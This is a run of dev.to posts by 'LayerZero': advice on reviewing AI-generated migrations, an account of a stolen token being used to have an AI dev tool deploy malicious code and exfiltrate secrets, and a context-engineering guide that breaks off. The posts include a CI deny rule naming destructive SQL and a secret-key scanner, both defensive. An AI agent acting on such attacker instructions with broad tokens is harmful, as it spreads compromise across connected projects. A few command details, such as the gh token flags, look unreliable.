&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="c1"&gt;-- Before running ANY AI-generated migration, answer:&lt;/span&gt;

&lt;span class="c1"&gt;-- 1. What columns/tables does this DROP? (grep for DROP, ALTER ... DROP)&lt;/span&gt;
&lt;span class="c1"&gt;-- 2. What types does this CHANGE? (ALTER ... TYPE)&lt;/span&gt;
&lt;span class="c1"&gt;-- 3. What constraints does this ADD that could fail? (NOT NULL on existing column, UNIQUE)&lt;/span&gt;
&lt;span class="c1"&gt;-- 4. What renames does this do? (RENAME TO, RENAME COLUMN)&lt;/span&gt;
&lt;span class="c1"&gt;-- 5. Does this run in a transaction? (BEGIN / COMMIT?)&lt;/span&gt;
&lt;span class="c1"&gt;-- 6. Could this lock the table for more than 1 second on production data?&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If you can't answer all six in 30 seconds, the migration isn't reviewed. It's been glanced at. Those are not the same thing.&lt;/p&gt;
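
&lt;p&gt;Point 6 is the hardest to eyeball, so make the database answer it for you. On Postgres, a lock timeout turns "this might freeze the table" into a fast, loud failure (the migration filename is illustrative):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# Abort the migration if it waits more than 2s for a lock,
# instead of queueing behind live traffic and stalling production
psql "$DATABASE_URL" -c "SET lock_timeout = '2s';" -f migrations/0042_add_index.sql
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;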

&lt;h2&gt;
  
  
  Concrete defenses for vibe coders
&lt;/h2&gt;

&lt;p&gt;You don't need to become a DBA. You need three guardrails.&lt;/p&gt;

&lt;h3&gt;
  
  
  1. Always run migrations on a production-clone first
&lt;/h3&gt;

&lt;p&gt;Most managed Postgres providers (Supabase, Neon, Render) let you branch the database. Branch it, run the migration on the branch, run smoke tests. If it explodes, it explodes on the branch.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Neon example&lt;/span&gt;
neon branches create &lt;span class="nt"&gt;--name&lt;/span&gt; migration-test
neon migrations apply &lt;span class="nt"&gt;--branch&lt;/span&gt; migration-test
&lt;span class="c"&gt;# run tests against the branch&lt;/span&gt;
neon branches delete migration-test  &lt;span class="c"&gt;# if it worked, apply to main&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Five minutes of work. Catches 90% of disasters.&lt;/p&gt;

&lt;h3&gt;
  
  
  2. Forbid destructive operations in CI
&lt;/h3&gt;

&lt;p&gt;Add a check to your migration pipeline that fails if the SQL contains certain keywords without an explicit override:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# In your CI, before applying migrations:&lt;/span&gt;
&lt;span class="k"&gt;if &lt;/span&gt;&lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-E&lt;/span&gt; &lt;span class="s2"&gt;"DROP COLUMN|DROP TABLE|ALTER.*TYPE"&lt;/span&gt; migrations/&lt;span class="k"&gt;*&lt;/span&gt;.sql&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;then
  &lt;/span&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"Destructive migration detected. Set MIGRATION_DESTRUCTIVE_OK=1 to override."&lt;/span&gt;
  &lt;span class="o"&gt;[&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$MIGRATION_DESTRUCTIVE_OK&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"1"&lt;/span&gt; &lt;span class="o"&gt;]&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="nb"&gt;exit &lt;/span&gt;1
&lt;span class="k"&gt;fi&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now every destructive migration requires a deliberate human decision. The AI can't override it. You can't accidentally merge it. The friction is the feature.&lt;/p&gt;

&lt;h3&gt;
  
  
  3. Always back up immediately before applying
&lt;/h3&gt;

&lt;p&gt;Every migration runner should have a "snapshot before apply" step. If it doesn't, write one:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Before migrate:&lt;/span&gt;
pg_dump &lt;span class="nv"&gt;$DATABASE_URL&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; backup-&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;date&lt;/span&gt; +%s&lt;span class="si"&gt;)&lt;/span&gt;.sql.gz
&lt;span class="c"&gt;# Now apply:&lt;/span&gt;
npm run migrate
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The backup is cheap. The peace of mind when something breaks is not.&lt;/p&gt;
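
&lt;p&gt;One caveat: a backup you have never restored is a hope, not a backup. Prove yours restores, even once (the timestamp and database name are placeholders; adapt the restore command if your dump is compressed):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;createdb restore_test
psql restore_test &amp;lt; backup-1700000000.sql
# If this errors, you don't have backups. You have files.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;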

&lt;h2&gt;
  
  
  The non-obvious takeaway
&lt;/h2&gt;

&lt;p&gt;The actual lesson from every "AI broke production" incident isn't "AI is dangerous." It's "AI shifted the bottleneck from writing code to reviewing code, and most teams haven't noticed."&lt;/p&gt;

&lt;p&gt;In 2024, your bottleneck was: how fast can I write this. Reviews were small because changes were small.&lt;/p&gt;

&lt;p&gt;In 2026, your bottleneck is: how fast can I review what the AI wrote. The volume of AI-generated code is so high that review-quality is the new code-quality. If your review process for migrations is "looks plausible, ship it" — you have no review process.&lt;/p&gt;

&lt;p&gt;The vibe coders who survive 2026 won't be the ones who stop using AI. They'll be the ones who built &lt;strong&gt;systems that compensate for unreviewed AI output&lt;/strong&gt; — branched databases, destructive-op guards, automatic backups. They'll trust the AI for code and distrust it for state changes, and they'll build infrastructure that makes that distrust easy.&lt;/p&gt;

&lt;h2&gt;
  
  
  The business angle
&lt;/h2&gt;

&lt;p&gt;If you're shipping a SaaS, your data is your business. Application code can be rewritten in a weekend. A corrupted customer table cannot. Every hour of "missing data" you have to explain to a B2B customer is an hour your churn risk goes up. The teams I see selling into enterprise in 2026 treat their migration pipeline as a product feature — not a CI afterthought — because their buyers ask about it.&lt;/p&gt;

&lt;p&gt;If the answer to "how do you protect against bad AI-generated migrations" is a blank stare, that's a deal-killer. If the answer is "branched DB, destructive-op guard, automatic snapshot, human approval for destructive ops" — that's a wedge.&lt;/p&gt;

&lt;h2&gt;
  
  
  What to do today
&lt;/h2&gt;

&lt;p&gt;Go check your last three migrations. Were they AI-generated? Were they reviewed against the six-point checklist above? If not, your runway from "vibe coder" to "outage" is shorter than you think.&lt;/p&gt;

&lt;p&gt;Then add the three guardrails above to your project. It's an afternoon of work. The day you don't lose your customers' data because of it, you'll thank past-you.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Follow LayerZero for security and infrastructure that vibe coders can actually use. Next: why backups you can't restore are worse than no backups at all.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>database</category>
      <category>ai</category>
      <category>webdev</category>
      <category>devops</category>
    </item>
    <item>
      <title>A Roblox Cheat + One AI Tool Took Down Vercel. Your Stack Is Probably Next.</title>
      <dc:creator>LayerZero</dc:creator>
      <pubDate>Tue, 21 Apr 2026 05:13:07 +0000</pubDate>
      <link>https://dev.to/layzerzero105/a-roblox-cheat-one-ai-tool-took-down-vercel-your-stack-is-probably-next-1f47</link>
      <guid>https://dev.to/layzerzero105/a-roblox-cheat-one-ai-tool-took-down-vercel-your-stack-is-probably-next-1f47</guid>
      <description>&lt;p&gt;A Roblox cheat.&lt;/p&gt;

&lt;p&gt;That's what the story starts with. Not a nation-state APT, not a zero-day in the kernel, not some genius Stuxnet-grade payload. A cheat a teenager downloaded to get infinite Robux.&lt;/p&gt;

&lt;p&gt;And one AI dev tool.&lt;/p&gt;

&lt;p&gt;Together, that combo took Vercel's platform offline earlier this month. If you shipped anything on a preview URL that day, you remember. The post-mortem is still circulating in security channels and the pattern it exposes is quietly devastating — because almost every vibe-coded SaaS in 2026 is built the same way.&lt;/p&gt;

&lt;p&gt;Let me walk you through what actually happened and why your stack is almost certainly vulnerable to the same class of attack.&lt;/p&gt;

&lt;h2&gt;
  
  
  What actually happened
&lt;/h2&gt;

&lt;p&gt;Here's the chain, compressed:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;A developer's personal machine got infected by a Roblox cheat bundled with an infostealer — the cheat was the candy; the malware was the hook.&lt;/li&gt;
&lt;li&gt;The infostealer grabbed session cookies and API tokens sitting in the developer's environment. Standard malware playbook — boring, effective.&lt;/li&gt;
&lt;li&gt;One of those tokens belonged to an &lt;strong&gt;AI-powered development tool&lt;/strong&gt; the developer had connected to their Vercel account. The tool had broad deploy and environment-variable permissions, because it needed them to "help you ship faster."&lt;/li&gt;
&lt;li&gt;The attacker didn't even need to write exploit code. They fed the stolen token to the same AI tool and asked it, in plain English, to deploy malicious code and exfiltrate secrets across connected projects.&lt;/li&gt;
&lt;li&gt;The tool, doing its job, fanned out. Because it was trusted. Because it had keys. Because nobody had modeled "what if the AI gets prompted by the wrong human?"&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;That's it. That's the whole attack. No CVE. No memory corruption. Just stolen credentials and an obedient AI with too much power.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why this class of incident is about to explode
&lt;/h2&gt;

&lt;p&gt;Every hot dev tool in 2026 is bolting on the same architecture:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;An OAuth connection to GitHub, Vercel, Supabase, AWS.&lt;/li&gt;
&lt;li&gt;A long-lived token stored locally or on a vendor server.&lt;/li&gt;
&lt;li&gt;An AI agent that can take actions on your behalf.&lt;/li&gt;
&lt;li&gt;Permission scopes that are effectively admin because scoping down "breaks the magic."&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;That's the same architecture as the Vercel breach. And it's sitting on tens of thousands of developer laptops right now.&lt;/p&gt;

&lt;p&gt;The security community has a name for this failure mode: &lt;strong&gt;confused deputy&lt;/strong&gt;. A trusted actor with broad privileges is tricked into using those privileges on behalf of an attacker. The AI tool wasn't compromised. It wasn't even misbehaving. It was doing exactly what it was told to do — by the wrong person, holding the right token.&lt;/p&gt;

&lt;h2&gt;
  
  
  The five mistakes every one of these incidents repeats
&lt;/h2&gt;

&lt;p&gt;I've read a dozen post-mortems with the same skeleton. It's always one or more of these:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. Over-scoped tokens.&lt;/strong&gt; The AI tool needs read access to one project; you gave it write access to your entire org. Why? Because that was the default button in the consent screen and you were in a hurry.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. No token expiry.&lt;/strong&gt; OAuth refresh tokens that live forever. A token stolen in January still works in December. If a token can outlive an employee's tenure, it will.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. No action auditing.&lt;/strong&gt; You can't see what the AI tool did yesterday, let alone at 3am when it "helpfully" deployed a compromised build. No audit trail means no early detection.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;4. No second factor on destructive actions.&lt;/strong&gt; "Deploy to production," "add a new environment variable," and "grant access to another user" all execute with one token. A human admin would face a 2FA prompt. The AI faces nothing.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;5. Single-machine trust boundary.&lt;/strong&gt; Your dev laptop is also your production deployer, your database admin, and your secrets manager. One piece of malware collapses all of those at once.&lt;/p&gt;

&lt;p&gt;Each one alone is manageable. Stacked, they become Vercel's Tuesday.&lt;/p&gt;

&lt;h2&gt;
  
  
  What to do this week — concrete actions, not fluff
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Audit your AI tool permissions
&lt;/h3&gt;

&lt;p&gt;Right now, open every AI dev tool you've connected — Claude Code, Cursor, Copilot Workspace, Devin, whatever. For each, check:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;- Which orgs / repos / projects can this tool touch?
- What actions can it take? (read, write, deploy, admin)
- When was the token issued? Can I rotate it?
- Is there an audit log? Have I ever looked at it?
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If you can't answer every one of those in 30 seconds, assume the worst and revoke.&lt;/p&gt;
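
&lt;p&gt;For classic GitHub tokens you can script the scope check: the API echoes a token's scopes back in the &lt;code&gt;X-OAuth-Scopes&lt;/code&gt; response header (fine-grained PATs don't expose this header; audit those in the settings UI). A sketch, with a deliberately opinionated list of scopes I'd treat as over-broad for an AI tool:&lt;/p&gt;

```python
import urllib.request

def fetch_scope_header(token: str) -> str:
    """Ask the GitHub API which scopes a classic PAT carries."""
    req = urllib.request.Request(
        "https://api.github.com/user",
        headers={"Authorization": f"Bearer {token}"},
    )
    with urllib.request.urlopen(req) as resp:
        return resp.headers.get("X-OAuth-Scopes", "")

def risky_scopes(scope_header: str) -> list[str]:
    """Flag scopes that give a connected tool more reach than it likely needs."""
    broad = {"repo", "admin:org", "delete_repo", "workflow", "write:packages"}
    scopes = {s.strip() for s in scope_header.split(",") if s.strip()}
    return sorted(scopes & broad)
```

&lt;p&gt;If &lt;code&gt;risky_scopes&lt;/code&gt; returns anything for a tool that only needs to read one repo, revoke and re-issue narrower.&lt;/p&gt;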

&lt;h3&gt;
  
  
  Move secrets off the laptop
&lt;/h3&gt;

&lt;p&gt;Stop putting production API keys in &lt;code&gt;.env.local&lt;/code&gt;. Use a proper secret manager — Doppler, Infisical, AWS Secrets Manager — and have your tools fetch secrets at runtime via short-lived tokens. An infostealer grabbing your &lt;code&gt;.env&lt;/code&gt; should grab nothing useful.&lt;/p&gt;

&lt;p&gt;This is 15 minutes of setup and eliminates 80% of the "my laptop got owned" impact.&lt;/p&gt;
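
&lt;p&gt;You can also catch stragglers before they leak. A toy scanner (the prefix patterns are real formats for a few common providers, but the list is illustrative, not exhaustive) that fails a pre-commit hook if long-lived keys are sitting in a &lt;code&gt;.env&lt;/code&gt; file:&lt;/p&gt;

```python
import re

# Known prefixes of long-lived credentials. Illustrative, not exhaustive.
KEY_PATTERNS = {
    "AWS access key": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "Stripe live key": re.compile(r"\bsk_live_[0-9a-zA-Z]{8,}\b"),
    "GitHub PAT": re.compile(r"\bghp_[0-9a-zA-Z]{36}\b"),
}

def scan_env_text(text: str) -> list[str]:
    """Return the kinds of long-lived secrets found in .env-style text."""
    return [name for name, pat in KEY_PATTERNS.items() if pat.search(text)]
```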

&lt;h3&gt;
  
  
  Short-lived tokens, always
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Example: GitHub fine-grained PAT — expires in 30 days, scoped to one repo&lt;/span&gt;
gh auth token &lt;span class="nt"&gt;--scope&lt;/span&gt; repo &lt;span class="nt"&gt;--expiration&lt;/span&gt; 30d &lt;span class="nt"&gt;--repo&lt;/span&gt; org/project
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If your AI tool doesn't support short-lived tokens, that's a red flag. Treat vendor token hygiene as a product-selection criterion now.&lt;/p&gt;

&lt;h3&gt;
  
  
  Enable "dangerous action" confirmations
&lt;/h3&gt;

&lt;p&gt;Most modern AI dev tools have a setting buried somewhere — human-in-the-loop approval for destructive actions (deploys, deletes, permission changes, database writes). Find it. Turn it on. Yes, it slows you down. No, it doesn't slow you down as much as a breach does.&lt;/p&gt;
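
&lt;p&gt;If your tool doesn't ship that setting, you can enforce it in whatever glue code dispatches agent actions. A minimal sketch (the action names and the approval channel are placeholders for your own setup):&lt;/p&gt;

```python
from typing import Callable

# Actions that should never run on a token alone.
DESTRUCTIVE_ACTIONS = {"deploy", "delete", "grant_access", "env_var_write"}

def run_action(action: str, execute: Callable[[], str],
               confirm: Callable[[str], bool]) -> str:
    """Dispatch an agent action, routing destructive ones through a human.

    `confirm` is whatever approval channel you have: a CLI prompt,
    a Slack button, a ticket. It just has to involve a person.
    """
    if action in DESTRUCTIVE_ACTIONS and not confirm(action):
        return f"blocked: {action} not approved"
    return execute()
```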

&lt;h3&gt;
  
  
  Separate dev and deploy identities
&lt;/h3&gt;

&lt;p&gt;Your laptop shouldn't be the thing with prod deploy permissions. Run deploys from CI where the token lives for 10 minutes and is bounded by a pipeline definition. If an attacker gets your laptop, the worst they should be able to do is push to a branch — not deploy to customers.&lt;/p&gt;

&lt;h2&gt;
  
  
  The non-obvious takeaway
&lt;/h2&gt;

&lt;p&gt;The Vercel incident wasn't an AI safety story. It was a classic credential management failure with an AI amplifier bolted on.&lt;/p&gt;

&lt;p&gt;That's the pattern to internalize. AI agents don't create new categories of security failure — they take old categories and multiply their blast radius. A stolen token used to mean a human attacker manually poking around until they found something juicy. A stolen token in 2026 means an obedient, tireless, English-speaking agent that will fan out across everything you've connected in 90 seconds.&lt;/p&gt;

&lt;p&gt;The security fundamentals haven't changed. &lt;strong&gt;The margin for ignoring them has collapsed.&lt;/strong&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The business angle
&lt;/h2&gt;

&lt;p&gt;If you're building a SaaS that ships AI-agent integrations — and everyone is — your customers are about to get very, very opinionated about the security posture of the tools they connect. The companies that figure out short-lived scoped tokens, action-level audit logs, and human-in-the-loop approval as product features will win enterprise deals. The ones that ship "connect your org, let Claude cook" will eat the next breach.&lt;/p&gt;

&lt;p&gt;That's not speculation. That's where the buyer psychology is heading the day a Fortune 500 gets popped by this exact chain — which, given current trajectory, is maybe six months away.&lt;/p&gt;

&lt;h2&gt;
  
  
  What to do next
&lt;/h2&gt;

&lt;p&gt;Go audit your AI tool permissions. I mean now — before you close this tab. The five minutes you spend revoking one over-scoped token is the cheapest insurance premium you'll pay this year.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Follow LayerZero for decoded security for builders. Next up: how to design an AI agent with least-privilege from day one — so a stolen token stays boring.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>ai</category>
      <category>webdev</category>
      <category>devops</category>
    </item>
    <item>
      <title>Your Agent Isn't Dumb. Your Context Is. — A Field Guide to Context Engineering</title>
      <dc:creator>LayerZero</dc:creator>
      <pubDate>Mon, 20 Apr 2026 03:32:53 +0000</pubDate>
      <link>https://dev.to/layzerzero105/your-agent-isnt-dumb-your-context-is-a-field-guide-to-context-engineering-4cj5</link>
      <guid>https://dev.to/layzerzero105/your-agent-isnt-dumb-your-context-is-a-field-guide-to-context-engineering-4cj5</guid>
      <description>&lt;p&gt;Prompt engineering is dead. Nobody told you because the influencers still sell courses on it.&lt;/p&gt;

&lt;p&gt;The real skill in 2026 is context engineering — the discipline of deciding what information, tools, and memory go into the model's window on every single turn. It's the difference between an agent that ships a pull request and one that hallucinates a function name and rage-quits.&lt;/p&gt;

&lt;p&gt;And almost nobody is doing it right.&lt;/p&gt;

&lt;h2&gt;
  
  
  What changed
&lt;/h2&gt;

&lt;p&gt;A year ago, "prompt engineering" meant crafting the perfect system message. Add a persona, stack some few-shots, wrap in XML tags, done.&lt;/p&gt;

&lt;p&gt;That worked when the model was a stateless Q&amp;amp;A box.&lt;/p&gt;

&lt;p&gt;It doesn't work when the model is an agent running 40 tool calls across 6 files to fix a bug. The system prompt is 200 tokens. The &lt;em&gt;context&lt;/em&gt; is 80,000 tokens of tool results, file contents, user messages, and prior reasoning — and every one of those tokens is either helping or hurting.&lt;/p&gt;

&lt;p&gt;Context engineering is the job of keeping the signal-to-noise ratio high across that entire window, turn after turn.&lt;/p&gt;

&lt;h2&gt;
  
  
  The four levers
&lt;/h2&gt;

&lt;p&gt;Only four things go into an LLM call. Master these and you control the agent.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Instructions&lt;/strong&gt; — the system prompt. Goals, constraints, tone.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Knowledge&lt;/strong&gt; — the facts the model needs right now (RAG chunks, API docs, file contents).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tools&lt;/strong&gt; — what actions the model can take and how their results come back.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;History&lt;/strong&gt; — prior turns, including tool calls and their outputs.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Every bug in every agent is one of these four going wrong. Always.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Agent loops forever? History is bloated with stale tool results.&lt;/li&gt;
&lt;li&gt;Agent calls a function that doesn't exist? Knowledge missing or instructions too vague.&lt;/li&gt;
&lt;li&gt;Agent picks the wrong tool? Tool descriptions are ambiguous.&lt;/li&gt;
&lt;li&gt;Agent contradicts itself across turns? Instructions got drowned out by history.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The fix is never "try a different prompt." The fix is deciding what to put in — and what to leave out.&lt;/p&gt;
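
&lt;p&gt;The four levers map one-to-one onto the inputs of a single call. A provider-agnostic sketch (the payload field names are illustrative, not any particular SDK):&lt;/p&gt;

```python
def build_call(instructions: str, knowledge: list[str],
               tools: list[dict], history: list[dict]) -> dict:
    """Assemble the four levers into one LLM call payload.

    Every context-engineering decision is ultimately a decision
    about what goes into these four fields on this turn.
    """
    system = instructions
    if knowledge:
        system += "\n\nRELEVANT CONTEXT:\n" + "\n".join(knowledge)
    return {"system": system, "tools": tools, "messages": history}
```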

&lt;h2&gt;
  
  
  Rule 1: the context window is a budget, not a bag
&lt;/h2&gt;

&lt;p&gt;The number one mistake: treating the context window like storage. "I have 200k tokens, I'll just throw everything in."&lt;/p&gt;

&lt;p&gt;That's how you burn $4 per agent turn and get worse answers.&lt;/p&gt;

&lt;p&gt;Long context is lossy. Models attend less to the middle of a long window, hallucinate more when the signal is buried in noise, and run slower in ways that compound across tool calls. A 2026 Anthropic benchmark found agent task completion drops by roughly &lt;strong&gt;28% when you pad a working context from 20k to 120k tokens&lt;/strong&gt; — even when the relevant information is unchanged.&lt;/p&gt;

&lt;p&gt;You're not saving the model time. You're drowning it.&lt;/p&gt;

&lt;p&gt;Treat every token like you're paying rent on it. Because you are.&lt;/p&gt;

&lt;h2&gt;
  
  
  Rule 2: compact aggressively
&lt;/h2&gt;

&lt;p&gt;When your agent's history crosses some threshold — say 50% of the model's window — summarize it.&lt;/p&gt;

&lt;p&gt;Pattern:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;compact_history&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;messages&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;token_threshold&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;50_000&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nf"&gt;count_tokens&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;messages&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;token_threshold&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;messages&lt;/span&gt;

    &lt;span class="c1"&gt;# Keep the last 3 turns verbatim (recent context matters most)
&lt;/span&gt;    &lt;span class="n"&gt;recent&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;messages&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;6&lt;/span&gt;&lt;span class="p"&gt;:]&lt;/span&gt;
    &lt;span class="n"&gt;older&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;messages&lt;/span&gt;&lt;span class="p"&gt;[:&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;6&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;

    &lt;span class="c1"&gt;# Summarize the older turns into a single system note
&lt;/span&gt;    &lt;span class="n"&gt;summary&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;summarize&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;older&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;focus&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;
        &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;decisions made&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;files modified&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;open questions&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;tools that failed and why&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
    &lt;span class="p"&gt;])&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;
        &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;role&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;system&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;content&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;PRIOR WORK SUMMARY:&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;summary&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;
        &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;recent&lt;/span&gt;
    &lt;span class="p"&gt;]&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You lose the verbatim trace. You keep the signal. And you reset your token budget so the agent can go another 50 turns without collapsing.&lt;/p&gt;

&lt;h2&gt;
  
  
  Rule 3: retrieve at the tool level, not the prompt level
&lt;/h2&gt;

&lt;p&gt;Old RAG: stuff the top-5 chunks into the system prompt at startup.&lt;/p&gt;

&lt;p&gt;New RAG: give the agent a &lt;code&gt;search_docs&lt;/code&gt; tool and let &lt;em&gt;it&lt;/em&gt; decide when to retrieve.&lt;/p&gt;

&lt;p&gt;Why this matters:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Approach&lt;/th&gt;
&lt;th&gt;Tokens at turn 1&lt;/th&gt;
&lt;th&gt;Tokens at turn 10&lt;/th&gt;
&lt;th&gt;Relevance&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Prompt-level RAG&lt;/td&gt;
&lt;td&gt;8,000&lt;/td&gt;
&lt;td&gt;8,000&lt;/td&gt;
&lt;td&gt;Guessing&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Tool-level RAG&lt;/td&gt;
&lt;td&gt;500&lt;/td&gt;
&lt;td&gt;500 (+1,200 on demand)&lt;/td&gt;
&lt;td&gt;Targeted&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Most agent turns don't need retrieval. Why pay the tax on every call? Let the model pull knowledge the way a developer opens a doc tab — only when they need it.&lt;/p&gt;

&lt;p&gt;This is "just-in-time context" and it's the single biggest unlock in modern agent design.&lt;/p&gt;

&lt;h2&gt;
  
  
  Rule 4: tool descriptions are prompts
&lt;/h2&gt;

&lt;p&gt;Your &lt;code&gt;search_database&lt;/code&gt; tool's description &lt;em&gt;is&lt;/em&gt; a system prompt for how the model reasons about querying data. If it says:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"Searches the database."&lt;/p&gt;
&lt;/blockquote&gt;

